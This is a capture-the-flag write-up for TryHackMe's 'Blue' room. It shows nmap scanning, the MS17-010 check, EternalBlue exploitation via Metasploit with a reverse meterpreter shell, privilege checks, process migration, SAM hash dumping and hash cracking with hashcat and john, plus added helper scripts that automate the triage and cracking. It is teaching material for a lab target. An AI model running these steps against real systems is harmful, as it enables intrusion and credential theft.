tryhackme Blue writeup




connect to the TryHackMe network using their VPN (install the OpenVPN client first)
    sudo apt install openvpn


download your VPN config file from https://tryhackme.com/access and start it (leave this terminal open for the whole session)
    sudo openvpn [config file]


once connected, ping the target machine you started in Task 1 to confirm you can reach it over the VPN


in my case it is 10.10.154.72. Scan the low ports and probe service versions (-sV)
    nmap -sV -p 0-1000 10.10.154.72


you find 3 ports open under 1000: 135 (msrpc), 139 (netbios-ssn) and 445 (microsoft-ds, i.e. SMB)
for the sake of brevity: SMB on port 445 is the vulnerable service here. To find an nmap script that tests for a specific SMB vulnerability, list the SMB scripts that ship with nmap
    ls -al /usr/share/nmap/scripts | grep -e "smb-"


run the smb-vuln-* scripts one by one to see which one fires, or skip straight to the one for MS17-010:
    sudo nmap -p 445 10.10.154.72 --script smb-vuln-ms17-010.nse
the script reports State: VULNERABLE, confirming the host is exposed to MS17-010 (EternalBlue, the SMBv1 remote code execution bug)
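An added example (not part of the original writeup) that scripts the two scan steps above: it picks the hosts with 445 open out of a grepable nmap scan (nmap -oG) and runs the MS17-010 NSE check only against those. The nmap output embedded in it is constructed to mirror the results in this writeup; the function names and the file argument are my own.

```sh
#!/bin/sh
# Added example (not from the writeup): triage a grepable nmap scan for hosts
# with SMB (445) open and run the MS17-010 NSE check only against those.
set -eu

# Constructed `nmap -oG -` output mirroring the writeup's scan. Real output
# separates the fields with tabs; awk splits on tabs and spaces alike, so
# spaces are used here for readability.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated
Host: 10.10.154.72 () Status: Up
Host: 10.10.154.72 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds/// Ignored State: closed (998)
Host: 10.10.154.73 () Ports: 22/open/tcp//ssh///, 445/closed/tcp//microsoft-ds///
# Nmap done'

# Constructed output of `nmap -p 445 --script smb-vuln-ms17-010` on a vulnerable host.
SAMPLE_NSE='Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143'

# hosts_with_port PORT (gnmap on stdin): print each host where PORT is open.
# Port entries look like "N/state/proto//name///" separated by ", ", so requiring
# a space or comma before the number avoids matching 1445 when asking for 445.
hosts_with_port() {
  local port="$1"
  grep -E "^Host:.*[ ,]${port}/open/" | awk '{ print $2 }' | sort -u
}

# ms17_010_vulnerable (NSE output on stdin): exit 0 if the script flagged the
# host VULNERABLE, 1 otherwise. Matching "State: VULNERABLE" rather than the
# bare word avoids a false hit on "State: NOT VULNERABLE".
ms17_010_vulnerable() {
  grep -q 'State: VULNERABLE'
}

# check_target IP: live check against a real host (needs nmap on the path).
check_target() {
  nmap -p 445 --script smb-vuln-ms17-010 "$1" | ms17_010_vulnerable
}

# With a gnmap file as $1, triage a real scan; with no arguments, demo on the
# constructed data so the script runs offline.
if [ "$#" -gt 0 ]; then
  hosts_with_port 445 < "$1" | while read -r ip; do
    if check_target "$ip"; then
      echo "$ip: VULNERABLE to MS17-010"
    else
      echo "$ip: not flagged"
    fi
  done
else
  echo "hosts with 445 open in the sample scan:"
  printf '%s\n' "$SAMPLE_GNMAP" | hosts_with_port 445
  if printf '%s\n' "$SAMPLE_NSE" | ms17_010_vulnerable; then
    echo "sample NSE output: VULNERABLE"
  fi
fi
```

Save the real scan with nmap -sV -p 0-1000 -oG scan.gnmap 10.10.154.72 and run the script with scan.gnmap as its argument; only hosts that actually expose 445 get the (noisier) vulnerability script thrown at them.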


now you will use metasploit to exploit the target
    msfconsole
search for eternalblue
    search eternalblue
select the exploit for use
    use exploit/windows/smb/ms17_010_eternalblue 
the module defaults the payload (the code sent to the target after successful exploitation) to windows/x64/meterpreter/reverse_tcp, a reverse meterpreter shell that connects back to you; it is listed under Payload options when you run options
set the remote host as your target
    set RHOSTS 10.10.154.72
set the address the reverse shell connects back to: your own VPN (tun0) IP, not your LAN address. The option is LHOST (singular); a value set as LHOSTS is not picked up by the payload
    set LHOST 10.10.213.131
you can check the options
    options
exploit or run
    exploit


you will be greeted with a meterpreter shell once successful


you can skip this if you already have a meterpreter session. It is only needed when the exploit gave you a plain command shell that you want to upgrade to meterpreter:


ctrl-z to background session


search for the post module that upgrades a shell session
    search shell_to_meterpreter
    use post/multi/manage/shell_to_meterpreter


list your sessions
    sessions
set the session to upgrade (the number of your plain shell in that list)
    set SESSION 1
    run
the post module opens a new meterpreter session alongside the original shell; list the sessions again and interact with the new one
    sessions
    sessions -i [new session id]


_______________________________________________________


https://docs.rapid7.com/metasploit/meterpreter-getsystem/
run getsystem to elevate from a local administrator to NT AUTHORITY\SYSTEM; it tries Metasploit's built-in techniques (named-pipe impersonation and friends) until one works. EternalBlue already lands you as SYSTEM, so here it only confirms that, but it is the usual next step when an exploit leaves you as a lower-privileged user
    getsystem
then check who you are
    getuid
and you will see that you are NT AUTHORITY\SYSTEM
you can spawn a regular cmd shell if you'd like
    shell
    whoami
and go back to the meterpreter shell by
    ctrl-z


now, back in the meterpreter shell, list the processes running on the machine
    ps
pick one whose user is NT AUTHORITY\SYSTEM and that is unlikely to exit on its own
migrating injects meterpreter into that process, so your session no longer depends on the exploited SMB service and keeps SYSTEM privileges
you can read more about it here https://security.stackexchange.com/questions/90578/how-does-process-migration-work-in-meterpreter
I inject into svchost.exe; use the PID from your own ps output, it will not be 2146
    migrate 2146


next dump the local account hashes from the Windows SAM (Security Accounts Manager) database. This needs a SYSTEM-level session, which is why the previous steps matter. read more: https://www.sciencedirect.com/topics/computer-science/security-accounts-manager-database
    hashdump


three users with their password hashes, like so


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::


copy these into a text file. Each line is username:RID:LM hash:NT hash. The LM hash is a legacy format that modern Windows no longer stores, which is why all three accounts show the same placeholder aad3b435b51404eeaad3b435b51404ee (the LM hash of an empty string). Only the NT hash is worth cracking, so strip everything except the username and NT hash:


Administrator:31d6cfe0d16ae931b73c59d7e0c089c0
Guest:31d6cfe0d16ae931b73c59d7e0c089c0
Jon:ffb43f0de35be4d9917ac0cc8ad57f8d


open a new terminal and cd into the directory where you saved the hashes into a txt file
    cd Desktop/


you can use either John the Ripper or hashcat to crack the NT hashes. Kali and similar distros ship wordlists in /usr/share/wordlists/ (on Kali, rockyou.txt.gz must be gunzipped first). rockyou.txt holds over 14 million real leaked passwords and is enough for most labs.
--username tells hashcat that each line starts with a username to ignore, -a 0 selects a straight dictionary attack, -m 1000 selects the NTLM hash type, hashes.txt is your saved file and the last argument is the wordlist
    hashcat --username -a 0 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt


it cracks Jon's hash to alqfna22. The other two hashes, 31d6cfe0d16ae931b73c59d7e0c089c0, are the NT hash of an empty password, so Administrator and Guest have nothing to crack (those accounts are normally disabled). If you rerun hashcat on the same file it will report the hash as already in its potfile; add --show to the command to print what it has cracked
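An added example, not from the writeup, that does the hash clean-up and cracking steps above as one script: it reads raw hashdump output, drops the LM field, skips accounts whose NT hash is the empty-password hash, and hands the rest to hashcat (or to john, as in the notes at the end). The three sample lines are the ones printed above; the function names, the output file name nt_hashes.txt and the default wordlist path are my choices.

```sh
#!/bin/sh
# Added example (not from the writeup): turn meterpreter `hashdump` output
# (pwdump format user:RID:LM:NT:::) into a crack list for hashcat or john.
set -eu

EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of the empty password
DEFAULT_WORDLIST='/usr/share/wordlists/rockyou.txt'

# Constructed sample: the three lines hashdump printed earlier in the writeup.
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::'

# pwdump_to_nt (stdin -> stdout): "user:NT" for every account that has a real
# password. Lines that are not pwdump records (banners, junk) are dropped.
pwdump_to_nt() {
  awk -F: -v empty="$EMPTY_NT" '
    NF >= 4 && length($4) == 32 && $4 ~ /^[0-9a-fA-F]+$/ {
      nt = tolower($4)
      if (nt == empty) next          # empty password: nothing to crack
      print $1 ":" nt
    }'
}

# blank_password_accounts (stdin -> stdout): accounts whose NT hash is the
# empty-password hash; worth reporting, not worth cracking.
blank_password_accounts() {
  awk -F: -v empty="$EMPTY_NT" 'NF >= 4 && tolower($4) == empty { print $1 }'
}

# crack_nt HASHFILE [WORDLIST]: straight (-a 0) dictionary attack on NTLM (-m 1000).
# --username tells hashcat each line is "user:hash"; --show afterwards prints every
# cracked entry, including ones already in the potfile from an earlier run.
crack_nt() {
  hashes="$1"; wordlist="${2:-$DEFAULT_WORDLIST}"
  command -v hashcat >/dev/null 2>&1 || { echo "hashcat not installed" >&2; return 1; }
  hashcat --username -a 0 -m 1000 "$hashes" "$wordlist" || true   # exit 1 = wordlist exhausted, not an error
  hashcat --username -m 1000 --show "$hashes"
}

# crack_nt_john HASHFILE [WORDLIST]: the same attack with John. The "user:" prefix
# can stay: john reads it as the username and the rest as the NT hash.
crack_nt_john() {
  hashes="$1"; wordlist="${2:-$DEFAULT_WORDLIST}"
  command -v john >/dev/null 2>&1 || { echo "john not installed" >&2; return 1; }
  john --format=NT --wordlist="$wordlist" "$hashes"
  john --format=NT --show "$hashes"
}

# With a file of raw hashdump output as $1 (and optionally a wordlist as $2),
# build the crack list and run hashcat; with no arguments, demo on the sample.
if [ "$#" -gt 0 ]; then
  pwdump_to_nt < "$1" > nt_hashes.txt
  echo "accounts with blank passwords:"; blank_password_accounts < "$1"
  crack_nt nt_hashes.txt "${2:-$DEFAULT_WORDLIST}"
else
  echo "crack list from sample:"; printf '%s\n' "$SAMPLE_HASHDUMP" | pwdump_to_nt
  echo "blank passwords in sample:"; printf '%s\n' "$SAMPLE_HASHDUMP" | blank_password_accounts
fi
```

Paste the hashdump output into a file and pass it as the first argument; the script writes nt_hashes.txt (only Jon's line for this box) and runs the same hashcat command as above, then prints the cracked result with --show so a second run does not hide it behind the potfile message.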


open a cmd shell to find the flags for the final part of the lab
    shell
    
search with dir: *flag*.txt is the filename pattern and /s recurses into every subdirectory. The shell usually drops you in C:\Windows\system32, so give the drive root explicitly so the whole drive is searched. On a real target with hundreds of thousands of files this takes considerably longer.
    dir C:\*flag*.txt /s


it finds flag1.txt in C:\
    type flag1.txt


it finds flag2.txt in C:\Windows\System32\config, the directory that holds the SAM database itself
    cd C:\Windows\System32\config\
    type flag2.txt


it finds flag3.txt in C:\Users\Jon\Documents (Explorer shows this as My Documents; on Windows 7 that name is a junction to Documents, and cd into the junction from cmd is denied)
    cd C:\Users\Jon\Documents
    type flag3.txt



Other notes:
if you want to use John the Ripper instead, the same hashes.txt works unchanged: john treats the part before the colon as the username and the part after it as the hash, so deleting the username is optional. --format=NT selects the NT hash format
    john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
display the results with
    john --format=NT --show hashes.txt
and you will see that it also cracks Jon's password to alqfna22